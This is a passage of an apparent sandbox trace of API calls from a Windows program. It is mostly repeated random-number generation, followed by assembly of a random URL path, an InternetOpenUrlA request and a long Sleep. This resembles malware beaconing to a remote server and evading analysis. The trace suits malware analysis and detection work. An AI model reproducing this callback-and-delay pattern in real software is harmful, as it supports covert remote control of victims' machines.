hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.655] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01883, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a01883) returned 0x0 [0259.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a018b0, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a018b0) returned 0x0 [0259.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a018d7, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a018d7) returned 0x0 [0259.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0259.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0259.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0259.853] GetProcessHeap () returned 0x440000 [0259.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0259.853] lstrcpyA (in: lpString1=0x472900, lpString2="P\x18 \x03" | out: lpString1="P\x18 \x03") returned="P\x18 \x03" [0259.853] lstrcatA (in: lpString1="P\x18 \x03", lpString2="/lwh3b9qe0kjm8JbMeAla/2gpc7cMIezjyj8U37d3bnh1vN97s/eqcsvkrw0xlw6s5tibv6m5Xjca59kryjl8imB76Gkkx5/nR95cvmBOzvfWybkMuwmunqj1rubiC7iOsyziz/d296r900Jze6isybqH9c6rN/" | out: lpString1="P\x18 \x03/lwh3b9qe0kjm8JbMeAla/2gpc7cMIezjyj8U37d3bnh1vN97s/eqcsvkrw0xlw6s5tibv6m5Xjca59kryjl8imB76Gkkx5/nR95cvmBOzvfWybkMuwmunqj1rubiC7iOsyziz/d296r900Jze6isybqH9c6rN/") returned="P\x18 \x03/lwh3b9qe0kjm8JbMeAla/2gpc7cMIezjyj8U37d3bnh1vN97s/eqcsvkrw0xlw6s5tibv6m5Xjca59kryjl8imB76Gkkx5/nR95cvmBOzvfWybkMuwmunqj1rubiC7iOsyziz/d296r900Jze6isybqH9c6rN/" [0259.853] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0259.853] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P\x18 \x03/lwh3b9qe0kjm8JbMeAla/2gpc7cMIezjyj8U37d3bnh1vN97s/eqcsvkrw0xlw6s5tibv6m5Xjca59kryjl8imB76Gkkx5/nR95cvmBOzvfWybkMuwmunqj1rubiC7iOsyziz/d296r900Jze6isybqH9c6rN/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0259.853] GetProcessHeap () returned 0x440000 [0259.853] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0259.853] GetProcessHeap () returned 0x440000 [0259.853] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01850 | out: hHeap=0x440000) returned 1 [0259.853] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0259.853] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0259.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0259.854] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0259.854] Sleep (dwMilliseconds=0x14eb2) [0259.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0259.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.986] GetProcessHeap () returned 0x440000 [0259.986] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16800 [0259.986] GetProcAddress (hModule=0x7ffc5bcc0000, 